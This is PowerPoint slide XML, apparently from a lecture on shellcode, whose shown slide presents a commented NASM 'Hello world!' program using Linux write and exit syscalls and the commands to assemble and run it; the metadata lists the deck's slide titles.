          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1104900" y="1628839"/>
            <a:ext cx="7211516" cy="3013646"/>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tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>section .data       ;  Data segment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>world!", 0x0a   ;  The string and newline char</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>section .text       ; Text segment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>global _start       ; Default entry point for ELF linking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_start:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; SYSCALL: write(1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 14)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 4        ; Put 4 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, since write is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #4.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 1        ; Put 1 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> is 1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      ; Put the address of the string into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>13       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; Put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, since our string is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bytes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; Call the kernel to make the system call happen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; SYSCALL: exit(0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 1        ; Put 1 into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, since exit is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> #1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 0        ; Exit with success.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="1485900" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0x80          ; Do the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4869160"/>
            <a:ext cx="7571184" cy="1659429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="90487" tIns="44450" rIns="90487" bIns="44450">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Compile and run</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nasm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -f elf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>helloworld.asm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>helloworld.o</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Hello world</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://www.geevor.com/media/images/Rocks%20and%20Metals/arsenic.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8921" y="4724400"/>
            <a:ext cx="1462424" cy="12668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811533" y="5979468"/>
            <a:ext cx="2198487" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Intel ASM syntax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30583289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OOR">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TOOR</Template>
  <TotalTime>23761</TotalTime>
  <Words>5102</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>763</Paragraphs>
  <Slides>41</Slides>
  <Notes>33</Notes>
  <HiddenSlides>1</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41</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="55" baseType="lpstr">
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Bold</vt:lpstr>
      <vt:lpstr>Corbel</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Courier New Bold</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>ヒラギノ角ゴ ProN W6</vt:lpstr>
      <vt:lpstr>TOOR</vt:lpstr>
      <vt:lpstr>What‘s in a shellcode?</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Types of shellcodes</vt:lpstr>
      <vt:lpstr>Shellcode basics</vt:lpstr>
      <vt:lpstr>Write system call</vt:lpstr>
      <vt:lpstr>Standard file descriptors</vt:lpstr>
      <vt:lpstr>Linux system calls in assembly</vt:lpstr>
      <vt:lpstr>System calls in Linux</vt:lpstr>
      <vt:lpstr>Hello world in assembly</vt:lpstr>
      <vt:lpstr>Assembly</vt:lpstr>
      <vt:lpstr>Hello world modified</vt:lpstr>
      <vt:lpstr>helloworld1 hexdumped</vt:lpstr>
      <vt:lpstr>helloworld1 disassembled</vt:lpstr>
      <vt:lpstr>Shellcode development</vt:lpstr>
      <vt:lpstr>helloworld1 into shellcode</vt:lpstr>
      <vt:lpstr>Shellcode development</vt:lpstr>
      <vt:lpstr>NULL bytes and other bad bytes</vt:lpstr>
      <vt:lpstr>Removing NULL bytes</vt:lpstr>
      <vt:lpstr>Removing NULL bytes</vt:lpstr>
      <vt:lpstr>Deeper understanding of shellcode</vt:lpstr>
      <vt:lpstr>Shell coders arsenal</vt:lpstr>
      <vt:lpstr>Clearing a 32 bit register (e.g. eax)</vt:lpstr>
      <vt:lpstr>Continue removing NULL bytes</vt:lpstr>
      <vt:lpstr>Getting down to business</vt:lpstr>
      <vt:lpstr>Getting down to business</vt:lpstr>
      <vt:lpstr>Getting down to business</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Compressing our shellcode further</vt:lpstr>
      <vt:lpstr>Can we crash this?</vt:lpstr>
      <vt:lpstr>A matter of privilege</vt:lpstr>
      <vt:lpstr>A matter of privilege</vt:lpstr>
      <vt:lpstr>A matter of privilege</vt:lpstr>
      <vt:lpstr>Regain privileges</vt:lpstr>
      <vt:lpstr>Shellcode to regain privileges</vt:lpstr>
      <vt:lpstr>Remote shellcode</vt:lpstr>
      <vt:lpstr>Remote shellcode</vt:lpstr>
      <vt:lpstr>Remote shellcode</vt:lpstr>
      <vt:lpstr>Remote shellcode</vt:lpstr>
      <vt:lpstr>Remote shellcode</vt:lpstr>
      <vt:lpstr>Remote shellcode</vt:lpstr>
      <vt:lpstr>Remote shellcode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Markus Pueschel</dc:creator>
  <dc:description>Redesign of slides created by Randal E. Bryant and David R. O'Hallaron</dc:description>
  <cp:lastModifiedBy>ymir</cp:lastModifiedBy>
  <cp:revision>392</cp:revision>
  <cp:lastPrinted>1999-09-20T15:19:18Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-01-05T22:39:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-09-14T14:48:22Z</dcterms:modified>
</cp:coreProperties>
</file>